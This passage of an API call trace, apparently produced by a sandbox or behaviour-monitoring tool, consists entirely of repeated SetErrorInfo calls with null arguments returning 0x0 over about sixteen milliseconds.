[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.882] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.883] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.884] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.885] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.887] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.888] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.889] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.890] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.892] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.895] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
